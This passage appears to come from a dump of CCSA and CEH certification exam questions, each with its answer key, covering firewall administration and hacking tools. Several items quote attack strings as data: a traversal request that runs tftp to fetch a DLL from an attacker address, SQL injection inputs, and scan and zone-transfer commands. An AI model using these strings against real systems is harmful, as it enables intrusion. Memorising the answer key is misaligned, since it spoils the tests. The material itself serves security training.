recognized by the firewall's user database. ^C. VPN1 NG allows connections, but hides the firewall from authenticated users. ^D. Unknown users receive error messages indicating that the host does not know the users names on the server. ^E. VPN1 NG does not allow connections from users who do not know the name of the firewall. B #CCSA Q67. When creating a user authentication rule, select intersect with user database for source and destination to allow access according to the source specified in the rules. ^A. True ^B. False C #CCSA Q69. 
Which of the following statements about Client Authentication are FALSE? ^A. In contrast to User Authentication, which allows access per user, Client Authentication allows access per IP address. ^B. Authentication is by user name and password, but it is the host machine (client) that is granted access. ^C. Client Authentication is more secure than User Authentication, because it allows multiple users and connections from an authorized IP address or host. ^D. Client Authentication enables administration to grant access privileges to a specific IP address after successful authentication. B #CCSA Q70. When you make a rule, the rule is not enforced as part of your Security Policy. ^A. True ^B. False E #CCSA Q71. Which of the following user actions would you insert as an INTERNAL Authentication scheme? ^A. The user enters the security dynamics passcode. ^B. The user is prompted for a response from the RADIUS server. ^C. The user is prompted for a response from the AXENT server. ^D. The user is prompted for a response from the TACACS server. ^E. The user enters an operating system account password. A #CCSA Q72. When configuring Static NAT, you cannot map the routable IP address to the external IP address of the Firewall; if attempted, the security policy installation fails with the following error "rule X conflicts with rule Y". ^A. True ^B. False B #CCSA Q73. The advantage of client authentication is that it can be used for any number of connections and for any services, but authentication is only valid for a specified length of time. ^A. True ^B. False A #CCSA Q74. You have set up Static NAT on a VPN1 to allow Internet traffic to an internal web server. ^ You notice that any HTTP attempts to that machine are being dropped in the log due to rule 0. ^ Which of the following is the most likely cause? ^A. Spoofing on the internal interface is set to Network defined by Interface IP and Net Mask. ^B. Spoofing on the external interface is set to Not Defined. ^C. 
You do NOT have a rule that allows HTTP access to the internal Web Server. ^D. You do NOT have a rule that allows HTTP from the Web Server to Any destination. ^E. None of the above. C #CCSA Q75. As a firewall administrator, you are required to create VPN1 users for authentication. ^ When you create a user for user authentication, the data is stored in the? ^A. Inspect Engine. ^B. Rule base. ^C. Users database ^D. Rulebase fws file ^E. Inspect module. A #CCSA Q76. If users authenticated successfully, they have matched the User and Authentication rule restriction of the user group to which they belong. ^A. True ^B. False B #CCSA Q77. The only way to unblock BLOCKED connections is by deleting all the blocking rules from the Rule base. ^A. True ^B. False B #CCSA Q78. When you perform a cp fetch, what can you expect from this command? ^A. Firewall retrieves the user database from the tables on the Management Module. ^B. Firewall retrieves the inspection code from the remote Management Module and installs it to the kernel. ^C. Management module retrieves the IP address of the target specified in the command. ^D. Management module retrieves the interface information for the target specified in the command. ^E. None of the above. B #CCSA Q79. Each incoming UDP packet is looked up in the list of pending connections. Packets are delivered if they are _________. ^A. A request. ^B. A response to a request. ^C. Source routed. ^D. Allowed by the Rule Base. ^E. Both B and D E #CCSA Q80. Assume an NT system. What is the default expiration for a Dynamic NAT connection NOT showing any TCP activity? ^A. 30 Seconds. ^B. 60 Seconds. ^C. 330 Seconds. ^D. 660 Seconds. ^E. 3600 Seconds. B #CCSA Q81. When you disable a rule the rule is NOT disabled until you verify your Security Policy. ^A. True ^B. False B #CCSA Q82. Static Source NAT translates public internal source IP addresses to private external source IP addresses. ^A. True ^B. False B #CCSA Q83. 
What is the command that lists the interfaces to which VPN1 is bound? ^A. Fw ctl iflist ^B. Ifconfig -a ^C. Ifconfig \all ^D. Netstat -m ^E. Cp bind -all B #CCSA Q84. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^ Which of the following is the best authentication method for roaming users, such as doctors updating patient records at various floor stations in a hospital? ^A. Session ^B. User ^C. Client ^D. Connection ^E. None of the above. C #CCSA Q85. Which command utility allows verification of the Security Policy installed on a firewall module? ^A. Fw ctl pstat. ^B. Fw printlic. ^C. Fw stat. ^D. Fw ver. ^E. Fw pol. E #CCSA Q86. You are a firewall administrator with one Management Server managing 3 different Enforcement Modules. ^ One of the Enforcement Modules does NOT show up in the dialog box when attempting to install a Security Policy. Which of the following is the most likely cause? ^A. No master file was created. ^B. License for multiple firewalls has expired. ^C. The firewall has NOT been rebooted. ^D. The firewall was NOT listed in the Install On column of the rule. ^E. The firewall is listed as "Managed by another Management Module (external)" in the Workstation Properties dialog box. B #CCSA Q87. In the Install On column of a rule, when you select a specific firewall object as the only configuration object, that rule is enforced on all firewalls within the network, with related configurations. ^A. True ^B. False E #CCSA Q88. As an administrator, you want to force your users to authenticate. You have selected Client Authentication as your authentication scheme. ^ Users will be using a Web browser to authenticate. On which TCP port will authentication be performed? ^A. 23 ^B. 80 ^C. 259 ^D. 261 ^E. 900 A #CCSA Q90. Client Authentication rules should be placed above the Stealth rule, so users can authenticate to the firewall. ^A. True ^B. False B #CCSA Q91. 
The following rule base tells you any automatically created NAT rules have simply hidden but have not been deleted from the Rule Base. ^A. True ^B. False B #CCSA Q92. You are using static Destination NAT. You have VPN1 NG running on Windows NT/Solaris platform. ^ By default, routing occurs after the address translation when the packet is passing from the client towards the server. ^A. True ^B. False D #CCSA Q93. Which of the following statements is FALSE? ^A. Dynamic NAT cannot be used for protocols where the port number cannot be changed. ^B. Dynamic NAT cannot be used when an external server must distinguish between clients based on their IP addresses. ^C. With Dynamic NAT, packet's source port numbers are modified. ^D. In Dynamic NAT, public internal addresses are hidden behind a single private external address using dynamically assigned port numbers to distinguish between them. ^E. Dynamically assigned port numbers are used to distinguish between hidden private addresses. B #CCSA Q94. When you modify a User Template, any users already operating under that template will be updated to the new template properties. ^A. True ^B. False A #CCSA Q95. Installation time for creating network objects will decrease if you list machine names and IP addresses in the hosts files. ^A. True ^B. False C#CEH Q.1 If your concern is hackers coming across the firewall and using SMB session hijacking, ^ you can block that by not allowing UDP ports __________ as well as TCP ports _________ from coming through the firewall. ^ (Select the Best Answer)^A. 167, 345 and 123 and 137^B. 80, 21 and 23, 110^C. 137, 138 and 139, 445^D. 1277, 1270 and 80, 21 D#CEH Q.2 Microsoft has maintained backward compatibility with its older dialects. This backward compatibility means that when a SMB session is initiated, a more primitive plain text level of authentication can often be negotiated that provides for maximum exposure of the password data. 
^ Because SMB was developed to facilitate file and print sharing on local networks, a Windows client will automatically attempt to log onto an SMB server. ^ In the process, the host and client will exchange password hashes. ^ These pairs of password hashes, the challenge from the host plus the response from the client, can be sniffed and saved for later cracking by using which of the following hacking tools? (Select the Best Answer)^A. SMBRelay^B. ObiWan^C. Hunt^D. L0phtcrack^E. NBTCracker C#CEH Q.3 How do you prevent SMB Hijacking in Windows operating systems? (Select the Best Answer)^A. Install WINS Server and configure secure authentication.^B. Disable NetBIOS over TCP/IP in Windows NT and 2000.^C. The only effective way to block SMB hijacking is to use SMB signing.^D. Configure 128-bit SMB credentials key-pair in TCP/IP properties. B#CEH Q.4 This tool is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. ^ You can interactively browse the capture data, viewing summary and detail information for each packet. ^ This tool has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. (Select the Best Answer)^A. Port Scan plus^B. Ethereal^C. Sam Spade^D. Lp0Crack D#CEH Q.5 What is a packet sniffer? (Select the Best Answer)^A. A packet sniffer is a keyboard logger that plugs into computer networks and captures passwords.^B. A packet sniffer is a packet blocker firewall that plugs into computer networks and generates packets.^C. A packet sniffer is an Intrusion Detection System that monitors real time hacking events.^D. A packet sniffer is a wire-tap device that plugs into computer networks and eavesdrops on the network traffic. ALL#CEH Q.6 What protocols are vulnerable to sniffing? (Select all that apply)^A. Telnet and rlogin^B. HTTP^C. SNMP^D. NNTP^E. POP^F. FTP^G. 
IMAP A#CEH Q.8 If you want to get a list of all the IP addresses as well as aliases assigned within a domain, you can grab that information if the DNS server allows zone transfers. ^ The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. ^ Which nslookup commands dump all available records, assuming zone transfers are enabled? (Select the Best Answer)^A. >set type=any > ls -d eccouncil.org >ns.eccouncil.org >exit^B. < list=any < lc -x eccouncil.org< dns.eccouncil.org< exit^C. < set type=any < dir -c eccouncil.org< dns.eccouncil.org< exit^D. < set type=any < list report eccouncil.org< dns.eccouncil.org< exit^E. < set type=any < dns -ls eccouncil.org< dns.eccouncil.org< exit B#CEH Q.9 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. ^ Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. ^ How do you prevent DNS spoofing? (Select the Best Answer)^A. Disable DNS Mail Relay.^B. Disable DNS Zone Transfer.^C. Install DNS logger and track vulnerable packets.^D. Install DNS Anti-spoofer A#CEH Q.10 Douglas Brown discovered a new worm that targets Microsoft SQL Server installations where the SQL Administrator password is blank (note that this is the default configuration for SQL Server 2000 and earlier). ^ The worm logs in using the Administrator account, then calls a command shell to FTP and install a Trojan. 
The Trojan communicates with the attacker via IRC, where the attacker is able to utilize the infected systems to launch Distributed Denial of Service (DDoS) attacks. ^ You would like to port scan all the SQL Servers that are vulnerable to this attack in your organization. Which port number will you scan for? (Select the Best Answer)^A. 1433^B. 1432^C. 1434^D. 1435 B#CEH Q.11 This hacking tool runs as a Windows OS stack and hides itself from netstat command. Any directory or file that starts with '_root_' will be hidden. Any process that starts with '_root_' will be hidden. (Select the Best Answer)^A. WINOS Trojan^B. NT Rootkit^C. NubUs^D. Back Orifice B#CEH Q.12 This Linux program is a daemon intended to catch someone installing a rootkit or running a packet sniffer. ^ It is designed to run continually with a small footprint under an innocuous name. ^ When triggered, it sends email, appends to a logfile, and disables networking or halts the system. It is designed to install with the minimum of disruption to a normal multiuser system, and should not require rebuilding with each kernel change or system upgrade. (Select the Best Answer)^A. cheops^B. chkrootkit^C. desps^D. qswatcher D#CEH Q.13 What does the tool MP3Stego do? (Select the Best Answer)^A. MP3Stego adds watermark to music data in MP3 files during the compression process.^B. MP3Stego encrypts music in MP3 files during the compression process.^C. MP3Stego adds images in MP3 files during the compression process.^D. MP3Stego hides information in MP3 files during the compression process. B#CEH Q.14 This hacking tool when placed over a web page reveals password displayed as "*****". (Select the Best Answer)^A. NAT^B. SnadBoy^C. Password Revealer^D. MugBoy A#CEH Q.15 How long will it take to crack a password using straight dictionary attack (3 million words) on a single 1.5 GHz Intel Pentium machine? (Select the Best Answer)^A. 2.5 mins^B. 13.6 days^C. 4.2 hours^D. 
4.6 days C#CEH Q.16 This tool is a remote scanner for the most common Distributed Denial of Service programs. These were the programs responsible for the recent rash of attacks on high profile web sites such as Yahoo, Amazon, eBay. ^ This tool will detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings. (Select the Best Answer)^A. DDoScanner^B. DoSMinger^C. DDoSPing^D. DDoSKiller B#CEH Q.17 This tool from GFI is a freeware security scanner to audit your network security. It scans entire networks and provides NETBIOS information for each computer such as hostname, shares, logged on user name. ^ It does OS detection, tests password strength, detects registry issues. Reports are outputted in HTML. ^ This tool checks the network for all potential methods that a hacker might use to attack a network. ^ By analyzing the operating system and the applications running on your network, it identifies possible security holes in the network. In other words, it plays the devil's advocate and alerts weaknesses before a hacker can find them, enabling the administrator to deal with these issues before a hacker can exploit them. (Select the Best Answer)^A. SAN Secure Scanner^B. LANGuard Network Scanner^C. GFI Guard^D. Sentinel Scanner B#CEH Q.18 The tool MingSweeper. What is it used for? (Select the Best Answer)^A. MingSweeper is a session hijacking tool.^B. MingSweeper is a network reconnaissance tool.^C. MingSweeper is an ARP poisoning tool.^D. MingSweeper is a port scanner. A#CEH Q.19 What does the hacking tool NetCat do? (Select the Best Answer)^A. NetCat is called the TCP/IP swiss army knife. It is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol.^B. NetCat is a powerful tool for network monitoring and data acquisition. This program allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression.^C. 
NetCat is a flexible packet sniffer/logger that detects attacks. NetCat is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system.^D. NetCat is a security assessment tool based on SATAN (Security Administrator's Integrated Network Tool). C#CEH Q.20 What is Whisker? (Select the Best Answer)^A. Whisker is a Trojan virus.^B. Whisker is an application scanner.^C. Whisker is a CGI vulnerability scanner.^D. Whisker is a SNMP dumping tool. D#CEH Q.21 This tool is a file and directory integrity checker. It aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, ^ it can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. (Select the Best Answer)^A. Hping2^B. DSniff^C. Cybercop Scanner^D. Tripwire C#CEH Q.22 This is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ^ It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. ^ Using this tool, you can: test firewall rules, perform [spoofed] port scanning, test net performance using different protocols, packet size, TOS (type of service), and fragmentation, do path MTU discovery, transfer files (even between really Fascist firewall rules), perform traceroute-like actions under different protocols, fingerprint remote OSs, audit a TCP/IP stack, etc. (Select the Best Answer)^A. Nemesis^B. Lids^C. Hping2^D. Cybercop Scanner B#CEH Q.23 WinTrinoo is an example of: (Select the Best Answer)^A. Firewall^B. DDoS Attack tool^C. Virus Scanner^D. 
Trojan Program B#CEH Q.24 Which of the following Nmap commands launches a stealth SYN scan against each machine that is up out of the 255 machines on class 'C' where target.example.com resides and tries to determine what operating system is running on each host that is up and running? (Select the Best Answer)^A. nmap -v target.example.com^B. nmap -sS -O target.example.com/24^C. nmap -sX -p 22,53,110,143,4564 198.116.*.1-127^D. nmap -XS -O target.example.com A#CEH Q.26 Snort is a Linux based Intrusion Detection System. Which command enables Snort into network intrusion detection (NIDS) mode assuming snort.conf is the name of your rules file and the IP address is: 192.168.1.0 with Subnet Mask: 255.255.255.0? (Select the Best Answer)^A. ./snort -c snort.conf 192.168.1.0/24^B. ./snort 192.168.1.0/24 -x snort.conf^C. ./snort -dev -l ./log -a 192.168.1.0/8 -c snort.conf^D. ./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf C#CEH Q.27 Many web based authentication models revolve around solely trusting cookies for verification of a user's session. If a malicious person can obtain a user's cookies for a service, then he can use those cookies to access the victim's account. ^ Pages that can use a server's cookies are limited to that particular server, or higher-level domain servers (like hotmail.passport.com for '.passport.com' cookies). ^ In order for a malicious person to obtain a victim's cookies for a site, he must manufacture a fake javascript that must execute within a page from that same domain. ^ This is done by manipulating the error messages that are returned, either from 404 requests or form elements that are echoed back to the screen unescaped. For example, by sending a web-mail user an email with a link to the very same server, the link looks harmless, and it can trick the user into clicking on the link, thus running the embedded javascript and sending his cookies to the malicious person. How do you prevent this type of cookie hijacking? 
(Select the Best Answer)^A. Escaping all form data that is echoed to the screen and not echoing 404 file requests eliminates this problem.^B. Setting up some secondary authentication requirement other than cookie information would at least make this session-stealing problem a lesser threat.^C. Enabling SSL on all the authentication pages will solve the problem.^D. Implement 128-bit cookie security on all your sessions with the client browser. A#CEH Q.28 Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow. A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by default on all NT4 and Windows 2000 server systems (running IIS), can be exploited to remotely execute code of an attacker's choice. ^ The fault lies within the decoding and interpretation of form data received by malicious clients. ^ By chunk encoding form data we can force IIS to overwrite 4 bytes of arbitrary memory with data we supply. This is a very serious vulnerability and Microsoft suggests that administrators install the supplied patch as soon as possible. ^ What is the patch number, which fixes this bug in IIS? (Select the Best Answer)^A. Microsoft Security Bulletin MS02-018^B. Microsoft Security Bulletin MS02-456^C. Microsoft Security Bulletin MS02-056^D. Microsoft Security Bulletin MS02-234 E#CEH Q.29 tini is a simple and very small (3kb) trojan backdoor for Windows, coded in assembler. It listens at TCP port and connects via remote Command Prompt. What port number does it listen on by default? (Select the Best Answer)^A. 3333^B. 4444^C. 5555^D. 6666^E. 7777 C#CEH Q.30 Which of the following programs is capable of detecting and removing more than 1000 Trojan Horses from your system? (Select the Best Answer)^A. NuBuS^B. SubSeven^C. Tauscan^D. BO^E. Tini^F. TrojanKiller D#CEH Q.31 What is Zombie Zapper? (Select the Best Answer)^A. Zombie Zapper is a DDoS tool that installs on a victim's machine as "zombie".^B. Zombie Zapper is a firewall, which works on Linux and Solaris OS.^C. 
Zombie Zapper is a trojan that listens on port 2345.^D. Zombie Zapper is a free, open source tool that can tell a zombie system flooding packets to stop flooding. B,C#CEH Q.32 Which of the following are examples of Distributed Denial of Service (DDoS) attack tools? (Select all that apply)^A. WinTrinoo^B. TFN2K^C. Stacheldraht^D. Knight^E. Kayton^F. GTBot B#CEH Q.33 Netcat is a simple network utility which reads and writes data across network connections, using TCP or UDP protocol. Which of the following command scans for open ports between [1 - 140]? (Select the Best Answer)^A. nc -xx -q -w2 my-attacker-IP-address [1-140]^B. nc -vv -z -w2 my-attacker-IP-address 1-140^C. nc my-attacker-IP-address (1,140)^D. nc 140 my-attacker-IP-address -vv B#CEH Q.34 This network tool is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. ^ This tool isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates. (Select the Best Answer)^A. AeroSeek^B. AiroPeek^C. AirMan^D. AirCell^E. AirWire D#CEH Q.35 Which of the following is a wireless LAN (WLAN) tool which recovers encryption keys. (Select the Best Answer)^A. AirPeek^B. AirMan^C. Airport^D. AirSnort D#CEH Q.36 "Anonymous web surfing" is a proxy server, which downloads the webpage you requested and then displays the web page to you through an encrypted URL. ^ Since your computer doesn't make a connection to the server, it brings it to you totally anonymous, and they have no idea you were there, and information about you and your computer isn't gathered by that website. ^ All you do is type in the web site you want to visit and you will be taken there promptly and securely. Which of the following web site provides free anonymous web surfing services? (Select the Best Answer)^A. http://www.anoyume.com^B. 
http://www.privacybusters.com^C. http://www.badboys.com^D. http://www.silenter.com B#CEH Q.37 Which hacking tool exploits Microsoft Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability? (Select the Best Answer)^A. IIS Lockdown^B. Jill-32^C. IPP Scanner^D. IPP Exploit^E. URLScan C#CEH Q.38 Which of the following is a ramdisk-based Linux distribution that boots from a single floppy and loads its packages from an HTTP/FTP server? (Select the Best Answer)^A. Red Hat Linux^B. Turbo Linux^C. Trinux^D. Flopix^E. Raminux A#CEH Q.39 SQL injection is usually caused by developers who use "string-building" techniques in order to execute SQL code. For example, in a search page, the developer may use the following code to execute a query: ^ Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") ^ Which of the following prevents SQL injection on a web page? (Select the Best Answer)^A. For string data, replace single quotes with two single quotes using the replace function or equivalent : goodString = replace(inputString,','')^B. For string data, replace double quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString,'','')^C. For string data, replace single quotes with asterisk using the replace function or equivalent: goodString = replace(inputString,',*)^D. For string data, replace single quotes with two underscore characters using the replace function or equivalent: goodString = replace(inputString,',__) D#CEH Q.40 How do you test SQL injection vulnerability on a Web page? (Select the Best Answer)^A. Input "asterisk character" something like:^ hi* or 1=1-- ^ Into login, or password, or in the URL. Example:^ Login: hi* or 1=1--^ Pass: hi* or 1=1--^ http://duck/index.asp?id=hi* or 1=1- ^B. Input "underscore character" something like:^ hi__ or 1=1--^ Into login, or password, or in the URL. 
Example:^ Login: hi__ or 1=1--^ Pass: hi__ or 1=1--^ http://duck/index.asp?id=hi__ or 1=1--^C. Input "double quote" something like:^ hi'' or 1=1--^ Into login, or password, or in the URL. Example:^ Login: hi'' or 1=1--^ Pass: hi'' or 1=1--^ http://duck/index.asp?id=hi'' or 1=1--^D. Input "single quote" something like:^ hi' or 1=1--^ Into login, or password, or in the URL. Example:^ Login: hi' or 1=1--^ Pass: hi' or 1=1--^ http://duck/index.asp?id=hi' or 1=1-- A#CEH Q.41 Which of the following is a dictionary attack tool for Microsoft SQL Server, which lets you test if the login accounts are strong enough to resist an attack? (Select the Best Answer)^A. SQLdict^B. SQLAttack^C. SQLWalker^D. C-Q-L-HACK B#CEH Q.42 Which of the following is a hacking tool that has the ability to hijack TCP sessions? For example, you can capture the contents of a Telnet session and spy on what a person is doing, or hijack the session and start typing in your own commands. (Select the Best Answer)^A. JungleBungle^B. Juggernaut^C. SesHijack^D. TCP Kidnapper A#CEH Q.43 Smurf attacks are the easiest distributed DOS attack to commit. ^ In its simplest form, the attacker begins by using a commonly available program to scan the Internet to locate routers that allow entry to broadcast pings. ^ When he or she locates this kind of router, the next step is to forge ping packets with the origination address of the intended victim. This is done using packet manipulation tools. ^ This type of attack can also use other Internet Control Message Protocol (ICMP) techniques. ^ To avoid arrest, the attacker will typically use a hacked computer to send out these forged ping packets. ^ These packets are then sent to the network behind the vulnerable router. ^ Each computer on this network echoes each attacking ping out to the victim designated in the ping's forged header. 
^ So if there are two hundred computers on this intermediary network, for every single ping of the attacking computer, they will send 200 pings out to the victim. ^ How do you defend against this type of Smurf attack? (Select the Best Answer)^A. deny broadcast pings at the intermediary network's border router.^B. deny ICMP at the intermediary network's border router.^C. deny smurf 34.6 type frames at the firewall.^D. enable broadcast pings at the intermediary network's border router. D#CEH Q.44 Which tool detects the presence of Trinoo, TFN, or Stacheldraht clients on your machine? (Select the Best Answer)^A. DDoS Detector^B. TrinooBuster^C. TFNKiller^D. RID C#CEH Q.45 Trinoo is a dangerous distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. A trin00 network consists of a small number of servers, or masters, and a large number of clients, or daemons. ^ The denial of service attack utilizing a trin00 network is carried out by an intruder connecting to a trin00 master and instructing that master to launch a denial of service attack against one or more IP addresses. The trin00 master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. What default port does the master send UDP broadcast packets to the daemon? (Select the Best Answer)^A. 27445^B. 27447^C. 27444^D. 27449 C#CEH Q.46 Buffer overflow attacks exploit a lack of bounds checking on the size of input being stored in a buffer array. ^ By writing data past the end of an allocated array, the attacker can make arbitrary changes to program state stored adjacent to the array. How do you protect your system from buffer overflow exploits? (Select the Best Answer)^A. Install a firewall system which protects from buffer overflow exploits.^B. Install an IDS system which protects from buffer overflow exploits.^C. 
Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack.^D. Proper virus pattern maintenance is the best way to protect your systems from the buffer overflow attack. D#CEH Q.47 First appearing on September 18, 2001, Nimda is a computer virus that caused traffic slowdowns as it rippled across the Internet, spreading through four different methods, infecting computers containing Microsoft's Web server, Internet Information Server (IIS), and computer users who opened an e-mail attachment. ^ Like a number of predecessor viruses, Nimda's payload appears to be the traffic slowdown itself - that is, it does not appear to destroy files or cause harm other than the considerable time that may be lost to the slowing or loss of traffic known as denial-of-service and the restoring of infected systems. With its multi-pronged attack, Nimda appears to be the most troublesome virus of its type that has yet appeared. Nimda virus refers to a file, when run, continues to propagate the virus. What is the name of this file? (Select the Best Answer)^A. cmd.exe^B. patch.exe^C. explorer.dll^D. admin.dll B#CEH Q.48 What buffer overflow vulnerability does Nimda virus exploit to gain access to IIS servers? (Select the Best Answer)^A. Internet Printing Protocol (IPP)^B. ISAPI DLL^C. Windows 2000 KRNLOS.EXE^D. IIS SMTP Services A#CEH Q.50 This is a Novell Netware hacking tool which simulates a Novell file server. The server will be visible for about 1 to 2 minutes. ^ On some systems the server will be visible for as long as the program is running. (Select the Best Answer)^A. Novelffs^B. Novell Faker^C. Noveknell^D. Novell Detector C#CEH Q.51 Digging into the rubbish bin to find pieces of information is an example of what attack? (Select the Best Answer)^A. Spoofing^B. Social Engineering^C. Dumpster Diving^D. 
Information gathering B,C#CEH Q.52 In a man-in-the-middle (MiTM) attack of a SSL connection sniffing, which of the following are true?^ Session Key A Session Key B^ Server <--------------> middle man <---------------> Client^ (Select all that apply)^A. Session Key A is sent by middle man and encrypted by client public key^B. Session Key B is sent by client and encrypted by middle man public key^C. Session Key A is sent by middle man and encrypted by server public key^D. Session Key B is sent by client and encrypted by client public key^E. Session Key A is sent by middle man and encrypted by client private key^F. Session Key B is sent by client and encrypted by server private key D#CEH Q.53 Which of the following network connection is or are encrypted and cannot be sniffed by an attacker on the network? (Select the Best Answer)^A. Telnet^B. POP3^C. NFS^D. SSH^E. SMTP B#CEH Q.54 In the Linux BIND NXT bug remote root exploit attack, the hacker inserts the shell code in which of the following connection? (Select the Best Answer)^A. UDP on victim port 53^B. TCP on victim port 53^C. UDP on victim port above 1024^D. TCP on victim port above 1024 D#CEH Q.55 An attacker on a Linux system may be able to recover a removed file from a disk using which of the following technique? (Select the Best Answer)^A. if he knows the name of the removed file^B. if he knows the date the file was removed^C. if he knows the size of the file that was removed^D. if he knows the inode value of the removed file C#CEH Q.56 These are firewall filter rules configured on a Linux system:^ # set the default to deny all incoming network traffic^ /sbin/ipchains -P input DENY^ # Allow incoming TCP traffic^ /sbin/ipchains -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT^ An attacker sends a huge packet targeted towards the Linux system. Which of the following will the firewall not block from an attack? (Select all that apply)^A. TCP connection scan^B. Half connect()^C. FIN scan^D. Xmas scan^E. 
Null scan A#CEH Q.57 Which of the following filter rules configured on a Linux system will block all outgoing ssh and telnet traffic to the hosts of the IP range 192.168.0.0 to 192.168.39.255? (Select the Best Answer)^A. ipchains -A output -p tcp -s any/0 -d 192.168.0.0/19 22:23 -j DENY -l ipchains -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l^B. iptables -A input -r ICMP -s any/0 -d 192.168.0.0/19 23:22 -j DENY -l iptables -A output -p tcp -s any/0 -d 192.168.32.0/21 23:22 -j DENY -l^C. ipcommand -A output -p tcp -s permit/1 -d 192.168.0.0/19 22:23 -j ALLOW -l ipcommand -A output -p tcp -s permit/1 -d 192.168.32.0/21 22:23 -j ALLOW -l^D. ipfilter -A output -p tcp -s any/0 -d 192.168.0.0/19 22:23 -j DENY -l ipfilter -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l C#CEH Q.58 From the following spam mail header, identify the host IP that sent this spam?^ Note: This question includes an HTML table which may not be accurately rendered^ From jie02@netvigator.com Tue Nov 27 17:27:11 2001^ Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)^ Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)^ Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk^ From: "china hotel web"^ To: "Shlam"^ Subject: SHANGHAI (HILTON HOTEL) PACKAGE^ Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0^ X-Priority: 3 X-MSMail-^ Priority: Normal^ Reply-To: "china hotel web"^ (Select the Best Answer)^A. 137.189.96.52^B. 
203.218.39.50^C. 203.218.39.20^D. 8.12.1.0 A#CEH Q.59 A httpd access_log file shows a WEB-IIS attack from a remote host^ 04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404^ Which of the following will provide the organization (in full name) that owns the whole IP block of the remote host (i.e. 137.68.0.0 - 137.68.255.255)? (Select the Best Answer)^A. #whois 137.68.238.15@whois.arin.net^B. #arin 137.68.238.15^C. #tucows -t 137.68.238.15^D. #dlookup 137.68.238.15@name -l D#CEH Q.60 Buffer overflow exploit can change the execution flow of a program because: (Select all that apply)^A. it injects shell code in the stack^B. it stuffs many 90 NOP code to the stack^C. it stuffs too many data into local function variables^D. it overwrites the return address of a call function in the stack B,C,D#CEH Q.61 Which of the following techniques are used for insertion attack on IDS? (Select all that apply)^A. Using IP Fragmentation^B. Using Invalid sequence no.^C. Using incorrect TCP checksum^D. Using short TTL^E. Using non-existent SYN packet flood A#CEH Q.62 The following is tcpdump packets of an ARP poisoning Man-in-the-Middle (MITM) attack.^ 0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^ What is the MAC address of the middleman? (Select the Best Answer)^A. 0:50:56:47:0:61^B. 0:50:56:47:0:65^C. 0:50:56:47:0:46 C#CEH Q.63 John's department Web site has been hacked. 
He reviews the Web site logs and discovers the following log entries:^ 34.5.67.4 is the IP address of the attacker:^ GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/ c+tftp%20-i%34.5.67.4%20GET%20Admin.dll%20c:\Admin.dll^ Which of the following worms is responsible for this attack? (Select the Best Answer)^A. Melissa^B. SQL Slammer^C. Nimda^D. Code Red C#CEH Q.64 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. ^ Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. ^ Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password ''just to double check our records.'' Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe.^ This is an example of what attack? (Select the Best Answer)^A. Reverse Psychology^B. Reverse Engineering^C. Social Engineering^D. Spoofing Identity^E. Faking Identity A#CEH Q.65 On October 7, 2001, NASA suffered massive attacks. Files were taken and employees' directories were invaded. ^ The intruders left methods to regain access to the system, called ''back doors,'' to allow them to reenter at any point in the future. ^ The attackers used a malicious program that 